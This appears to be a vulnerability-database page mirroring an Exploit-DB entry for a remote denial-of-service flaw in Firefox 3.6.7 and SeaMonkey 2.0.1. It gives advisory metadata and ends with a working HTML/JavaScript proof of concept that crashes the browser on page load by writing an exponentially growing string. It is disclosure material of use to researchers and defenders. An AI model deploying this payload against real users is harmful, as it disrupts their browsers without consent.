header-logo
Suggest Exploit
vendor:
Firefox, SeaMonkey
by:
7.5
CVSS
HIGH
Remote Denial-of-Service
400
CWE
Product Name: Firefox, SeaMonkey
Affected Version From: Firefox 3.6.7, SeaMonkey 2.0.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:mozilla:firefox:3.6.7, cpe:/a:mozilla:seamonkey:2.0.1
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux, Mac

Remote Denial-of-Service Vulnerability in Mozilla Firefox and SeaMonkey

The vulnerability allows an attacker to crash the affected browsers, resulting in a denial-of-service condition. Memory corruption or code execution may be possible but has not been confirmed.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38132/info

Mozilla Firefox and SeaMonkey are prone to a remote denial-of-service vulnerability.

Successful exploits may allow an attacker to crash the affected browser, resulting in a denial-of-service condition. Given the nature of this issue, memory corruption or code execution might be possible, but has not been confirmed.

The issue affects Firefox 3.6.7 and SeaMonkey 2.0.1; other versions may also be affected.

<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script>